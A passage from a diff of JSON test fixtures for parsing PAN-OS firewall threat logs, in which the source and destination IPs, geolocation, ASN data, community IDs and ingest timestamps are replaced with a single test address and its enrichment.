07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -10805,25 +10796,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -10864,7 +10857,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:cHzYL+SCc86AntedL6fbRx+2wzE=", + "community_id": "1:gPWVl9L6vD63Bmbr0WIBMb7WLdc=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -10899,15 +10892,15 @@ "picard" ], "ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545887616Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079456700Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -10930,23 +10923,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.239.6" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -10962,7 +10957,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,74.125.239.6,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11003,7 +10998,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:pRuFj5DzdmtFceU+OTawbYPhbJg=", + "community_id": "1:ALFdhF5T8C5nvWPkG0y4cS0/5QM=", "transport": "tcp", "application": "google-analytics", "direction": "inbound" @@ -11039,14 +11034,14 @@ ], "ip": [ "192.168.0.2", - "74.125.239.6", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545894834Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,74.125.239.6,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079460900Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -11083,25 +11078,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.193" + "ip": "175.16.199.1" }, - "message": "74.125.224.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11142,7 +11139,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:e27i7C6aBac+TOOJNFkXsvos7v0=", + "community_id": "1:e4r6wJ1eOAxh+oapONp3HAqGoiw=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -11177,15 +11174,15 @@ "picard" ], "ip": [ - "74.125.224.193", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545901930Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,74.125.224.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079464700Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -11222,25 +11219,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.239.20" + "ip": "175.16.199.1" }, - "message": "74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11281,7 +11280,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:I0nRW7fXHKg0He8sWEMh90mqrd8=", + "community_id": "1:qFLy3+Xm+Yir6ObFGBuWtDh9Ryo=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -11316,15 +11315,15 @@ "picard" ], "ip": [ - "74.125.239.20", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545909107Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079468600Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -11361,25 +11360,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 14907, + "number": 4837, "organization": { - "name": "Wikimedia Foundation Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.80.154.225" + "ip": "175.16.199.1" }, - "message": "208.80.154.225,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11420,7 +11421,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:W08oA4XVHxagaCryNLen9OoTnPk=", + "community_id": "1:VnAH7uRc/1Fo96KeI+gR6FdX/+4=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -11455,15 +11456,15 @@ "picard" ], "ip": [ - "208.80.154.225", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545916266Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,208.80.154.225,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079472Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -11500,25 +11501,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 14907, + "number": 4837, "organization": { - "name": "Wikimedia Foundation Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.80.154.234" + "ip": "175.16.199.1" }, - "message": "208.80.154.234,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11559,7 +11562,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:tvB7u/5+rW38IXXGXjbdYYdzJ5s=", + "community_id": "1:mDb1jYB7jLdLjgofpLkOZVSAbQo=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -11594,15 +11597,15 @@ "picard" ], "ip": [ - "208.80.154.234", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545923391Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,208.80.154.234,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079476400Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -11639,28 +11642,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Los Angeles", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -118.244, - "lat": 34.0544 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "65.54.75.25" + "ip": "175.16.199.1" }, - "message": "65.54.75.25,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11701,7 +11703,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:LvKTW1EWi7nem/oAlX14Sg2W9kU=", + "community_id": "1:rI+JtLN1tgRFWLwW5eO/dAik6SY=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -11736,15 +11738,15 @@ "jordy" ], "ip": [ - "65.54.75.25", + "175.16.199.1", "192.168.0.6", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545930700Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,65.54.75.25,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079482300Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -11781,25 +11783,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.206" + "ip": "175.16.199.1" }, - "message": "74.125.224.206,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11840,7 +11844,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Iur0h7DmmxbVfmJ8EKqn0v73b88=", + "community_id": "1:h4FhwHd9ztu4jpl3xgOaiB011a4=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -11875,15 +11879,15 @@ "jordy" ], "ip": [ - "74.125.224.206", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545938030Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,74.125.224.206,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079488Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -11920,25 +11924,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.195" + "ip": "175.16.199.1" }, - "message": "74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11979,7 +11985,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:n3f9RX9U3DOM57vpn8aB1QSo2Yw=", + "community_id": "1:GSknwPhD0cMXgRXsuLSg5w0bq98=", "transport": "tcp", "application": "google-maps", "direction": "outbound" @@ -12014,15 +12020,15 @@ "jordy" ], "ip": [ - "74.125.224.195", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545945265Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079495700Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -12059,28 +12065,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-KS", - "city_name": "Liberal", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Kansas", + "region_name": "Jilin", "location": { - "lon": -100.9286, - "lat": 37.0438 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 20376, + "number": 4837, "organization": { - "name": "Hubris Communications" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "207.178.96.34" + "ip": "175.16.199.1" }, - "message": "207.178.96.34,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12121,7 +12126,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:K6mY9EnrwYs1/a01d++OZ3kna2g=", + "community_id": "1:QRX5cQgXoEh4jqvb7ZLpI4VOhLc=", "transport": "tcp", "application": "rss", "direction": "outbound" @@ -12156,15 +12161,15 @@ "jordy" ], "ip": [ - "207.178.96.34", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545952458Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,207.178.96.34,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079501900Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -12201,25 +12206,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.195" + "ip": 